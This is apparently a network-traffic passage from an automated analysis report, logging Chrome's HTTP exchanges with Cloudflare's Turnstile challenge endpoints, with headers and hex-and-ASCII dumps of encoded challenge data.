                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              CF-Challenge: I4QnKzgsFcrsblePKpbDs_Q77AQFAQc48Yo9MGAmJgE-1733926783-1.1.1.1-QqogzN8CSnrMTMPigFQs0HNyIjjrp0QbL8ZSV6_WdiYEcGZzVpgZAsh7XUOdf5aA
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Origin: https://challenges.cloudflare.com
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/gotfg/0x4AAAAAAAbRCGJdTPdP8Ybc/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-12-11 14:19:55 UTC16384OUTData Raw: 76 5f 38 66 30 36 31 63 37 66 36 61 30 65 34 33 61 61 3d 77 4c 61 45 25 32 62 74 4d 4b 55 74 55 6e 4c 70 4b 38 76 47 70 4f 45 58 2b 51 4a 7a 4d 67 33 51 4d 38 4d 73 70 50 7a 74 6e 70 50 76 45 78 38 45 53 2b 45 54 4c 51 70 66 79 70 58 33 51 62 6d 53 74 55 51 70 69 7a 74 6c 4b 77 47 70 58 37 70 51 51 58 47 70 72 7a 4d 56 35 6d 56 56 7a 4d 6b 70 4d 55 6e 55 38 51 45 58 39 24 66 45 67 6a 79 70 66 45 74 38 55 70 39 64 6e 4d 54 70 54 38 70 6b 70 70 41 50 51 44 68 70 37 4f 51 70 37 24 79 70 78 70 62 77 62 70 70 49 41 61 73 32 35 38 51 6d 5a 61 7a 70 69 76 52 58 61 57 77 41 34 61 4f 74 51 41 73 79 4c 74 51 76 46 62 41 48 77 4b 51 51 70 51 4f 58 34 58 51 4d 46 70 58 77 2d 5a 37 79 4e 32 34 68 48 45 55 4d 77 38 44 63 34 6d 75 2d 57 34 5a 33 4b 4c 51 74 47 75 55 37
                                                                              Data Ascii: v_8f061c7f6a0e43aa=wLaE%2btMKUtUnLpK8vGpOEX+QJzMg3QM8MspPztnpPvEx8ES+ETLQpfypX3QbmStUQpiztlKwGpX7pQQXGprzMV5mVVzMkpMUnU8QEX9$fEgjypfEt8Up9dnMTpT8pkppAPQDhp7OQp7$ypxpbwbppIAas258QmZazpivRXaWwA4aOtQAsyLtQvFbAHwKQQpQOX4XQMFpXw-Z7yN24hHEUMw8Dc4mu-W4Z3KLQtGuU7
                                                                              2024-12-11 14:19:55 UTC15078OUTData Raw: 76 6e 61 70 52 58 43 61 6d 79 7a 45 74 35 31 43 46 70 58 24 34 38 70 47 70 39 70 70 79 70 67 70 58 70 79 2d 70 44 70 50 49 42 32 64 68 70 6e 41 2b 76 70 4e 70 77 51 70 38 70 77 45 54 45 62 38 70 5a 70 6b 45 37 76 70 34 70 6e 41 37 64 4d 46 70 67 51 70 79 4d 6d 70 69 51 37 4f 70 4f 35 39 7a 79 6e 70 69 70 74 7a 37 4e 4d 24 70 52 24 4d 64 6e 77 70 59 51 62 49 70 52 35 72 55 62 32 4d 4b 70 79 68 4a 61 70 52 70 59 45 56 79 4d 6e 34 6a 45 79 65 6d 42 70 50 45 59 62 75 63 43 56 70 70 38 74 77 49 67 45 67 70 4d 59 45 56 70 4d 58 51 52 70 4b 4a 79 2b 45 33 55 43 49 79 55 70 63 7a 71 70 37 79 58 72 70 32 4c 70 4c 4d 72 36 56 70 4d 51 70 7a 70 72 62 6b 53 4d 75 45 56 70 70 64 58 48 70 73 7a 70 4f 4d 34 7a 58 73 7a 48 70 2b 6f 6e 70 4d 35 48 62 35 43 35 68 51 70 76
                                                                              Data Ascii: vnapRXCamyzEt51CFpX$48pGp9ppypgpXpy-pDpPIB2dhpnA+vpNpwQp8pwETEb8pZpkE7vp4pnA7dMFpgQpyMmpiQ7OpO59zynpiptz7NM$pR$MdnwpYQbIpR5rUb2MKpyhJapRpYEVyMn4jEyemBpPEYbucCVpp8twIgEgpMYEVpMXQRpKJy+E3UCIyUpczqp7yXrp2LpLMr6VpMQpzprbkSMuEVppdXHpszpOM4zXszHp+onpM5Hb5C5hQpv
                                                                              2024-12-11 14:19:55 UTC330INHTTP/1.1 200 OK
                                                                              Date: Wed, 11 Dec 2024 14:19:55 GMT
                                                                              Content-Type: text/plain; charset=UTF-8
                                                                              Content-Length: 26272
                                                                              Connection: close
                                                                              cf-chl-gen: pcq/yM13ZN0DWMSstf6OWYgW9WXf1m5zCaCg6kg+4RGyptd3B2NqkcVQsfV4l4tEz0GYiRBdyI1CSAR2$aq32NkyLzCAcQrIK
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f061cc6dda1431a-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-12-11 14:19:55 UTC1039INData Raw: 65 6f 68 48 53 59 4b 49 58 6e 36 47 69 32 35 32 6b 48 61 45 56 46 70 6b 5a 49 39 71 5a 35 71 54 62 6d 79 41 66 6e 64 77 67 32 6c 63 6c 47 71 58 6f 34 70 73 73 4a 43 41 68 48 4f 4e 71 5a 61 55 64 37 53 46 6c 70 75 63 69 5a 32 62 74 59 43 6a 6f 58 36 6d 6b 36 61 36 6d 38 36 48 79 63 32 37 6a 34 2f 53 77 71 32 75 32 63 47 5a 31 70 71 55 6c 5a 33 4b 6d 73 36 75 77 38 58 6d 34 73 66 42 36 4b 48 6e 70 73 54 45 33 65 2b 79 78 76 58 53 72 74 62 78 74 75 58 72 38 64 76 39 36 74 66 4e 76 74 65 36 32 4c 33 47 2f 64 51 4b 30 2f 6a 56 44 74 6e 67 38 4e 6f 55 2f 68 44 2b 37 2b 6f 50 46 4e 6e 6d 2b 76 6e 72 2b 74 72 72 2b 78 55 61 39 50 48 69 4a 77 58 70 33 76 30 4e 36 50 6b 6c 47 77 45 77 48 68 67 55 38 43 6b 62 4d 44 30 32 4e 77 6b 72 48 7a 38 56 41 68 55 64 49 54 63
                                                                              Data Ascii: eohHSYKIXn6Gi252kHaEVFpkZI9qZ5qTbmyAfndwg2lclGqXo4pssJCAhHONqZaUd7SFlpuciZ2btYCjoX6mk6a6m86Hyc27j4/Swq2u2cGZ1pqUlZ3Kms6uw8Xm4sfB6KHnpsTE3e+yxvXSrtbxtuXr8dv96tfNvte62L3G/dQK0/jVDtng8NoU/hD+7+oPFNnm+vnr+trr+xUa9PHiJwXp3v0N6PklGwEwHhgU8CkbMD02NwkrHz8VAhUdITc
                                                                              2024-12-11 14:19:55 UTC1369INData Raw: 52 6b 4a 5a 71 68 46 6c 65 57 5a 4e 62 6e 70 31 75 57 31 78 2f 67 32 4a 37 58 5a 71 68 6d 32 36 6a 63 49 75 6a 61 32 65 4b 6a 61 6c 32 74 5a 4f 4d 6d 4c 4f 73 76 62 68 39 69 37 36 6d 73 35 43 47 6c 35 37 49 69 71 71 32 78 35 76 45 72 61 47 7a 78 63 53 7a 6f 71 6d 6f 31 74 6d 35 32 70 6e 65 34 64 2b 68 31 4d 4c 41 34 64 44 52 75 74 4f 31 33 75 58 72 78 71 6a 51 78 50 58 70 78 65 4f 77 32 4c 58 59 31 66 6e 54 32 4c 2f 33 41 64 6a 61 42 51 6a 76 36 65 6f 43 38 38 76 65 78 41 62 6f 36 4f 66 52 41 77 37 55 34 66 49 54 41 78 44 38 46 4e 76 77 33 66 34 41 44 4f 37 63 47 4f 44 65 35 53 66 70 4a 79 34 6c 44 66 6e 38 45 51 76 78 41 69 55 71 38 51 63 59 45 2f 67 72 4d 51 6b 50 45 42 45 36 4d 42 59 37 50 54 34 63 49 41 56 4b 49 41 64 4d 47 69 64 44 42 68 34 7a 44 30
                                                                              Data Ascii: RkJZqhFleWZNbnp1uW1x/g2J7XZqhm26jcIuja2eKjal2tZOMmLOsvbh9i76ms5CGl57Iiqq2x5vEraGzxcSzoqmo1tm52pne4d+h1MLA4dDRutO13uXrxqjQxPXpxeOw2LXY1fnT2L/3AdjaBQjv6eoC88vexAbo6OfRAw7U4fITAxD8FNvw3f4ADO7cGODe5SfpJy4lDfn8EQvxAiUq8QcYE/grMQkPEBE6MBY7PT4cIAVKIAdMGidDBh4zD0
                                                                              2024-12-11 14:19:55 UTC1369INData Raw: 58 6f 70 30 66 46 71 55 65 48 36 41 63 33 4b 47 59 59 43 4d 6a 58 65 63 69 6f 47 76 68 4c 57 43 68 71 43 4b 6d 59 70 7a 65 62 57 35 66 70 69 64 77 6f 36 64 6f 6f 4f 78 6f 70 75 43 68 4d 6d 70 76 49 6a 45 30 70 32 6d 6f 36 2f 53 7a 4d 57 6a 30 5a 4f 31 70 38 66 62 33 73 79 36 77 35 7a 4f 31 36 48 71 77 65 61 35 36 4b 44 6c 78 72 79 36 30 38 37 73 73 76 50 43 30 64 44 70 78 74 53 36 2b 37 6a 38 30 37 37 65 2b 4e 6a 36 36 51 73 4d 36 41 66 39 79 51 54 6d 41 73 37 6c 44 67 66 67 39 68 54 53 34 67 51 64 35 65 72 74 44 78 63 4c 38 52 63 65 34 2f 30 5a 47 43 50 33 42 65 30 70 37 67 30 71 44 41 6b 4c 4d 41 6f 6f 4b 44 41 6a 2b 43 77 47 39 43 30 58 44 6a 54 36 4a 43 38 65 51 43 59 6b 4f 41 51 4b 52 6b 49 6a 52 41 30 64 52 56 55 56 45 53 4d 59 45 53 74 64 46 30 5a
                                                                              Data Ascii: Xop0fFqUeH6Ac3KGYYCMjXecioGvhLWChqCKmYpzebW5fpidwo6dooOxopuChMmpvIjE0p2mo6/SzMWj0ZO1p8fb3sy6w5zO16Hqwea56KDlxry6087ssvPC0dDpxtS6+7j8077e+Nj66QsM6Af9yQTmAs7lDgfg9hTS4gQd5ertDxcL8Rce4/0ZGCP3Be0p7g0qDAkLMAooKDAj+CwG9C0XDjT6JC8eQCYkOAQKRkIjRA0dRVUVESMYEStdF0Z
                                                                              2024-12-11 14:19:55 UTC1369INData Raw: 32 61 68 61 48 4e 35 67 47 65 48 6f 49 78 35 6b 58 79 74 72 49 47 6d 62 72 53 48 68 49 2b 74 62 37 6d 64 66 34 43 50 76 6e 2b 2f 6d 59 2b 39 6f 37 4f 35 6d 4a 57 34 70 37 7a 41 73 72 36 68 79 73 4c 4e 71 61 50 5a 73 36 32 70 7a 4c 4f 33 34 62 69 78 30 62 33 44 79 4c 58 47 74 61 4b 6f 78 62 71 38 7a 73 72 62 30 71 71 2b 73 62 47 34 79 64 66 31 79 4d 57 31 76 4c 6d 2f 32 4c 72 66 7a 37 30 4a 35 41 6e 5a 39 2b 33 74 33 63 62 6d 79 2b 54 53 2f 4e 37 7a 45 78 59 46 32 42 6a 57 46 50 72 66 41 4e 4d 41 38 2b 2f 69 37 68 58 31 2b 2b 6f 68 48 41 38 44 47 6a 45 67 2f 6a 51 77 46 42 44 32 43 7a 51 34 4a 51 59 70 47 51 67 50 50 54 38 50 45 6a 77 7a 50 53 4e 4b 51 54 59 6a 4e 7a 73 67 50 43 77 72 51 54 39 53 51 52 67 54 45 55 4d 63 4d 7a 67 2b 53 68 6f 32 55 53 4e 68
                                                                              Data Ascii: 2ahaHN5gGeHoIx5kXytrIGmbrSHhI+tb7mdf4CPvn+/mY+9o7O5mJW4p7zAsr6hysLNqaPZs62pzLO34bix0b3DyLXGtaKoxbq8zsrb0qq+sbG4ydf1yMW1vLm/2Lrfz70J5AnZ9+3t3cbmy+TS/N7zExYF2BjWFPrfANMA8+/i7hX1++ohHA8DGjEg/jQwFBD2CzQ4JQYpGQgPPT8PEjwzPSNKQTYjNzsgPCwrQT9SQRgTEUMcMzg+Sho2USNh
                                                                              2024-12-11 14:19:55 UTC1369INData Raw: 56 6f 72 57 75 59 6d 71 4b 55 69 36 71 4d 74 59 35 72 6c 58 47 5a 6a 70 75 79 72 73 42 2b 72 72 32 6a 75 6e 2b 79 73 35 6d 32 74 72 69 73 77 6f 75 35 69 34 7a 43 73 61 6d 76 74 4c 65 36 6a 59 36 72 7a 5a 62 4d 74 74 76 68 6f 65 44 58 33 38 66 70 74 63 61 34 34 62 2b 38 76 72 37 76 7a 75 6e 72 34 2f 54 78 39 50 72 34 2b 38 58 62 30 4e 77 44 39 2f 37 76 37 66 66 52 39 65 4c 68 41 63 6a 65 78 73 33 4f 2f 75 49 45 33 41 72 53 30 4e 41 4c 36 77 67 63 44 65 2f 59 46 78 30 45 46 42 77 64 34 76 6b 49 49 2f 77 66 36 78 37 39 4a 2b 30 74 42 43 67 71 4b 69 34 77 42 79 34 4c 50 43 67 75 45 68 6e 32 50 68 51 65 48 6a 51 2b 42 51 42 42 52 43 70 45 51 6a 63 78 45 55 30 52 52 42 35 46 45 78 46 4d 53 68 63 56 55 6c 46 58 54 46 5a 5a 4e 47 51 66 55 69 46 63 57 46 31 68 52
                                                                              Data Ascii: VorWuYmqKUi6qMtY5rlXGZjpuyrsB+rr2jun+ys5m2triswou5i4zCsamvtLe6jY6rzZbMttvhoeDX38fptca44b+8vr7vzunr4/Tx9Pr4+8Xb0NwD9/7v7ffR9eLhAcjexs3O/uIE3ArS0NAL6wgcDe/YFx0EFBwd4vkII/wf6x79J+0tBCgqKi4wBy4LPCguEhn2PhQeHjQ+BQBBRCpEQjcxEU0RRB5FExFMShcVUlFXTFZZNGQfUiFcWF1hR
                                                                              2024-12-11 14:19:55 UTC1369INData Raw: 47 72 32 35 78 6c 61 71 77 73 6d 32 30 74 36 71 33 77 4c 69 36 74 37 32 34 72 35 47 43 77 4d 47 70 77 38 69 68 70 73 37 48 71 49 6e 41 6c 4b 7a 45 7a 4a 54 46 32 38 71 63 32 37 4c 55 6e 72 69 2b 30 70 37 65 73 73 6e 66 35 71 58 56 33 4e 62 4a 35 4f 71 76 36 2f 4f 79 37 38 6e 73 38 65 4c 33 32 66 66 52 36 2f 54 30 36 76 65 37 41 4c 7a 52 39 73 49 47 42 66 7a 4b 43 73 58 2b 42 2b 67 42 41 74 45 54 45 51 72 54 7a 4e 45 4a 33 50 44 79 48 4e 72 64 41 68 63 64 48 39 6b 68 4a 42 63 6b 4c 53 55 6e 4a 43 6f 6c 48 50 33 75 4c 53 34 57 4d 44 55 4f 45 7a 73 30 46 44 6b 70 2f 66 51 74 50 51 44 34 47 6a 4d 47 52 7a 55 2f 43 30 73 6a 50 68 41 46 56 45 55 55 51 6c 51 6d 55 53 31 45 57 6c 5a 59 4c 31 6c 63 57 30 78 63 58 69 4e 47 5a 32 55 6f 56 45 70 6d 57 45 70 79 4d 55
                                                                              Data Ascii: Gr25xlaqwsm20t6q3wLi6t724r5GCwMGpw8ihps7HqInAlKzEzJTF28qc27LUnri+0p7essnf5qXV3NbJ5Oqv6/Oy78ns8eL32ffR6/T06ve7ALzR9sIGBfzKCsX+B+gBAtETEQrTzNEJ3PDyHNrdAhcdH9khJBckLSUnJColHP3uLS4WMDUOEzs0FDkp/fQtPQD4GjMGRzU/C0sjPhAFVEUUQlQmUS1EWlZYL1lcW0xcXiNGZ2UoVEpmWEpyMU
                                                                              2024-12-11 14:19:55 UTC1369INData Raw: 70 58 47 73 65 58 43 4b 74 48 32 39 65 62 6d 44 6e 4c 53 34 67 33 79 69 77 59 69 6b 72 72 2b 4f 71 4d 54 4f 6b 5a 61 4e 78 70 54 57 72 73 79 5a 6b 4e 44 52 6e 5a 54 6b 32 4b 47 59 74 74 65 6d 77 4e 54 63 71 64 72 47 35 71 2f 49 33 4f 61 77 71 4d 72 6c 74 4b 7a 4f 38 72 6e 71 7a 76 71 39 2f 74 4c 33 77 74 7a 69 39 73 54 4b 77 51 48 4a 77 42 45 46 7a 4f 6a 38 43 39 45 44 43 51 33 56 38 41 6b 53 32 2f 54 2b 46 64 7a 69 32 52 54 68 45 78 6b 58 35 67 45 64 4a 2b 6b 62 44 79 50 73 35 41 4d 6c 38 51 30 48 4b 50 58 73 50 54 44 34 38 43 30 78 2f 68 6b 58 4e 67 45 64 4e 54 67 49 49 53 73 39 43 79 56 42 52 41 30 46 50 55 4d 54 4c 54 4e 54 46 6a 46 4e 53 68 6f 31 4e 31 41 65 49 78 70 62 49 42 6c 70 58 53 56 58 51 31 38 71 61 30 39 6b 4c 6b 6c 50 62 7a 4a 4e 56 32 38
                                                                              Data Ascii: pXGseXCKtH29ebmDnLS4g3yiwYikrr+OqMTOkZaNxpTWrsyZkNDRnZTk2KGYttemwNTcqdrG5q/I3OawqMrltKzO8rnqzvq9/tL3wtzi9sTKwQHJwBEFzOj8C9EDCQ3V8AkS2/T+Fdzi2RThExkX5gEdJ+kbDyPs5AMl8Q0HKPXsPTD48C0x/hkXNgEdNTgIISs9CyVBRA0FPUMTLTNTFjFNSho1N1AeIxpbIBlpXSVXQ18qa09kLklPbzJNV28
                                                                              2024-12-11 14:19:55 UTC1369INData Raw: 58 39 30 77 36 4b 79 70 35 69 47 68 33 7a 4c 71 4c 71 76 6f 49 36 50 68 4e 4f 6d 6a 70 4b 6d 30 73 6e 56 31 38 2b 63 72 74 6a 61 6e 64 36 6a 6f 64 7a 54 73 62 71 6e 77 4e 6a 66 71 36 6a 6e 34 37 44 43 37 4f 36 78 38 75 44 31 74 38 72 73 35 66 54 37 79 64 4b 2f 30 72 6b 46 39 39 55 42 42 2f 76 68 33 65 58 35 42 63 55 52 42 50 37 4a 45 74 50 6d 45 51 49 4b 7a 42 7a 76 31 74 6b 68 47 78 50 33 49 50 6e 6a 39 75 45 53 49 53 6a 31 41 2b 76 2b 4a 53 37 76 41 2f 45 65 4a 2b 67 34 45 50 4c 32 42 7a 63 77 46 44 77 61 41 42 51 54 4c 6a 31 45 45 68 6f 49 47 7a 31 4b 51 67 73 74 45 51 38 69 55 54 35 4e 56 43 49 79 47 43 77 35 48 52 73 75 58 56 34 67 4e 45 45 6c 49 69 46 6c 55 6d 46 6f 4e 6b 55 73 51 45 30 78 4c 69 31 78 63 6a 52 49 56 54 6b 32 63 48 6c 6d 64 58 78 4b
                                                                              Data Ascii: X90w6Kyp5iGh3zLqLqvoI6PhNOmjpKm0snV18+crtjand6jodzTsbqnwNjfq6jn47DC7O6x8uD1t8rs5fT7ydK/0rkF99UBB/vh3eX5BcURBP7JEtPmEQIKzBzv1tkhGxP3IPnj9uESISj1A+v+JS7vA/EeJ+g4EPL2BzcwFDwaABQTLj1EEhoIGz1KQgstEQ8iUT5NVCIyGCw5HRsuXV4gNEElIiFlUmFoNkUsQE0xLi1xcjRIVTk2cHlmdXxK


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              24192.168.2.1649736104.18.95.414436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-11 14:19:57 UTC598OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/253155817:1733923695:mM-KLczH2CXphey7QIg7rQsY9Vh66LXeu-8hr5wSDxE/8f061c7f6a0e43aa/I4QnKzgsFcrsblePKpbDs_Q77AQFAQc48Yo9MGAmJgE-1733926783-1.1.1.1-QqogzN8CSnrMTMPigFQs0HNyIjjrp0QbL8ZSV6_WdiYEcGZzVpgZAsh7XUOdf5aA HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-12-11 14:19:57 UTC379INHTTP/1.1 404 Not Found
                                                                              Date: Wed, 11 Dec 2024 14:19:57 GMT
                                                                              Content-Type: application/json
                                                                              Content-Length: 7
                                                                              Connection: close
                                                                              cf-chl-out: 4XF8oxgxo3MGlSAzdwkAeXo6g0k6r6JiUyE=$0WS9pAgEn2vwZM7p
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f061cd4981c0f51-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-12-11 14:19:57 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                              Data Ascii: invalid


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              25192.168.2.1649737104.18.95.414436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-11 14:20:00 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/253155817:1733923695:mM-KLczH2CXphey7QIg7rQsY9Vh66LXeu-8hr5wSDxE/8f061c7f6a0e43aa/I4QnKzgsFcrsblePKpbDs_Q77AQFAQc48Yo9MGAmJgE-1733926783-1.1.1.1-QqogzN8CSnrMTMPigFQs0HNyIjjrp0QbL8ZSV6_WdiYEcGZzVpgZAsh7XUOdf5aA HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Content-Length: 33855
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              Content-type: application/x-www-form-urlencoded
                                                                              CF-Chl-RetryAttempt: 0
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              CF-Challenge: I4QnKzgsFcrsblePKpbDs_Q77AQFAQc48Yo9MGAmJgE-1733926783-1.1.1.1-QqogzN8CSnrMTMPigFQs0HNyIjjrp0QbL8ZSV6_WdiYEcGZzVpgZAsh7XUOdf5aA
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Origin: https://challenges.cloudflare.com
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/gotfg/0x4AAAAAAAbRCGJdTPdP8Ybc/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-12-11 14:20:00 UTC16384OUTData Raw: 76 5f 38 66 30 36 31 63 37 66 36 61 30 65 34 33 61 61 3d 77 4c 61 45 25 32 62 74 4d 4b 55 74 55 6e 4c 70 4b 38 76 47 70 4f 45 58 2b 51 4a 7a 4d 67 33 51 4d 38 4d 73 70 50 7a 74 6e 70 50 76 45 78 38 45 53 2b 45 54 4c 51 70 66 79 70 58 33 51 62 6d 53 74 55 51 70 69 7a 74 6c 4b 77 47 70 58 37 70 51 51 58 47 70 72 7a 4d 56 35 6d 56 56 7a 4d 6b 70 4d 55 6e 55 38 51 45 58 39 24 66 45 67 6a 79 70 66 45 74 38 55 70 39 64 6e 4d 54 70 54 38 70 6b 70 70 41 50 51 44 68 70 37 4f 51 70 37 24 79 70 78 70 62 77 62 70 70 49 41 61 73 32 35 38 51 6d 5a 61 7a 70 69 76 52 58 61 57 77 41 34 61 4f 74 51 41 73 79 4c 74 51 76 46 62 41 48 77 4b 51 51 70 51 4f 58 34 58 51 4d 46 70 58 77 2d 5a 37 79 4e 32 34 68 48 45 55 4d 77 38 44 63 34 6d 75 2d 57 34 5a 33 4b 4c 51 74 47 75 55 37
                                                                              Data Ascii: v_8f061c7f6a0e43aa=wLaE%2btMKUtUnLpK8vGpOEX+QJzMg3QM8MspPztnpPvEx8ES+ETLQpfypX3QbmStUQpiztlKwGpX7pQQXGprzMV5mVVzMkpMUnU8QEX9$fEgjypfEt8Up9dnMTpT8pkppAPQDhp7OQp7$ypxpbwbppIAas258QmZazpivRXaWwA4aOtQAsyLtQvFbAHwKQQpQOX4XQMFpXw-Z7yN24hHEUMw8Dc4mu-W4Z3KLQtGuU7
                                                                              2024-12-11 14:20:00 UTC16384OUTData Raw: 76 6e 61 70 52 58 43 61 6d 79 7a 45 74 35 31 43 46 70 58 24 34 38 70 47 70 39 70 70 79 70 67 70 58 70 79 2d 70 44 70 50 49 42 32 64 68 70 6e 41 2b 76 70 4e 70 77 51 70 38 70 77 45 54 45 62 38 70 5a 70 6b 45 37 76 70 34 70 6e 41 37 64 4d 46 70 67 51 70 79 4d 6d 70 69 51 37 4f 70 4f 35 39 7a 79 6e 70 69 70 74 7a 37 4e 4d 24 70 52 24 4d 64 6e 77 70 59 51 62 49 70 52 35 72 55 62 32 4d 4b 70 79 68 4a 61 70 52 70 59 45 56 79 4d 6e 34 6a 45 79 65 6d 42 70 50 45 59 62 75 63 43 56 70 70 38 74 77 49 67 45 67 70 4d 59 45 56 70 4d 58 51 52 70 4b 4a 79 2b 45 33 55 43 49 79 55 70 63 7a 71 70 37 79 58 72 70 32 4c 70 4c 4d 72 36 56 70 4d 51 70 7a 70 72 62 6b 53 4d 75 45 56 70 70 64 58 48 70 73 7a 70 4f 4d 34 7a 58 73 7a 48 70 2b 6f 6e 70 4d 35 48 62 35 43 35 68 51 70 76
                                                                              Data Ascii: vnapRXCamyzEt51CFpX$48pGp9ppypgpXpy-pDpPIB2dhpnA+vpNpwQp8pwETEb8pZpkE7vp4pnA7dMFpgQpyMmpiQ7OpO59zynpiptz7NM$pR$MdnwpYQbIpR5rUb2MKpyhJapRpYEVyMn4jEyemBpPEYbucCVpp8twIgEgpMYEVpMXQRpKJy+E3UCIyUpczqp7yXrp2LpLMr6VpMQpzprbkSMuEVppdXHpszpOM4zXszHp+onpM5Hb5C5hQpv
                                                                              2024-12-11 14:20:00 UTC1087OUTData Raw: 45 59 59 77 63 2b 4d 66 4e 4c 54 4e 4d 6d 51 77 4d 59 49 48 79 57 57 73 45 43 39 5a 31 5a 64 58 49 58 78 70 6e 63 67 4a 6b 79 51 37 63 68 6e 70 75 6e 41 4f 6c 63 66 66 49 41 32 6e 52 56 53 2b 65 45 4d 46 44 41 70 54 74 39 63 55 76 70 63 79 63 74 51 2b 70 4d 24 61 2b 47 39 70 56 64 4d 35 6c 58 7a 74 24 6e 69 38 49 58 47 72 6e 58 69 79 54 62 38 4d 24 70 58 61 58 7a 62 76 74 71 57 6b 39 61 64 70 43 39 2b 70 4d 78 45 65 58 2b 50 77 58 6c 71 70 4e 67 51 6b 2d 59 51 32 45 70 51 70 4d 48 58 7a 70 56 56 43 35 53 79 77 42 51 38 70 4d 56 78 56 45 69 4d 59 6c 77 51 70 33 4c 68 51 62 2b 44 4d 70 67 41 59 77 48 69 43 6e 73 31 77 48 63 43 59 73 41 49 48 55 6c 72 73 4f 53 32 36 43 52 37 64 65 68 6a 64 47 5a 46 70 4d 2d 4b 72 4e 4d 6c 56 42 7a 34 77 63 4f 70 4c 61 31 5a
                                                                              Data Ascii: EYYwc+MfNLTNMmQwMYIHyWWsEC9Z1ZdXIXxpncgJkyQ7chnpunAOlcffIA2nRVS+eEMFDApTt9cUvpcyctQ+pM$a+G9pVdM5lXzt$ni8IXGrnXiyTb8M$pXaXzbvtqWk9adpC9+pMxEeX+PwXlqpNgQk-YQ2EpQpMHXzpVVC5SywBQ8pMVxVEiMYlwQp3LhQb+DMpgAYwHiCns1wHcCYsAIHUlrsOS26CR7dehjdGZFpM-KrNMlVBz4wcOpLa1Z
                                                                              2024-12-11 14:20:01 UTC286INHTTP/1.1 200 OK
                                                                              Date: Wed, 11 Dec 2024 14:20:01 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 4504
                                                                              Connection: close
                                                                              cf-chl-out: vgcsfow6TPF36sZKk4ssW0WShnl5cDohvRxSiMkFeKyi2sCBqIXHoOYo76V5g/HWR2VXW9QxlmZH0Ex2FpVKGq2FclaMd60DzhLXkHkfBH7XL4VKcscMlBs=$1REgMACaQUpWhV61
                                                                              2024-12-11 14:20:01 UTC1259INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 75 43 65 79 4a 79 6b 54 53 4a 56 49 31 38 51 6d 59 6e 6a 78 58 59 2b 65 2b 4f 66 7a 57 73 6c 6b 4a 66 33 62 77 50 49 79 6a 63 2b 6f 38 49 4a 52 61 64 61 70 2b 32 41 39 56 36 75 72 31 70 57 56 72 68 47 4b 6b 44 75 58 64 4b 31 73 33 43 48 77 37 30 62 48 44 6f 33 38 6d 4c 49 56 54 42 39 43 4a 49 55 74 77 58 64 64 37 6a 39 63 37 67 66 62 70 46 31 39 6a 66 36 47 58 39 67 51 4e 6f 56 6b 71 67 36 77 48 42 76 52 65 61 63 4a 6d 75 58 66 6a 7a 4c 37 73 32 43 39 55 4c 51 59 31 5a 39 72 69 74 43 73 71 34 4c 32 33 57 46 34 38 71 36 4b 6f 58 46 6d 2b 78 6e 43 57 54 37 59 6b 77 48 55 51 59 48 52 6c 43 54 38 43 36 77 51 6c 6e 66 53 37 38 71 72 63 6b 72 64 32 56 2f 64 4d 34 70 69 74 46 71 75 4c 57 2f 4e 74 56 2f 33 50 4c 46 48 79
                                                                              Data Ascii: cf-chl-out-s: uCeyJykTSJVI18QmYnjxXY+e+OfzWslkJf3bwPIyjc+o8IJRadap+2A9V6ur1pWVrhGKkDuXdK1s3CHw70bHDo38mLIVTB9CJIUtwXdd7j9c7gfbpF19jf6GX9gQNoVkqg6wHBvReacJmuXfjzL7s2C9ULQY1Z9ritCsq4L23WF48q6KoXFm+xnCWT7YkwHUQYHRlCT8C6wQlnfS78qrckrd2V/dM4pitFquLW/NtV/3PLFHy
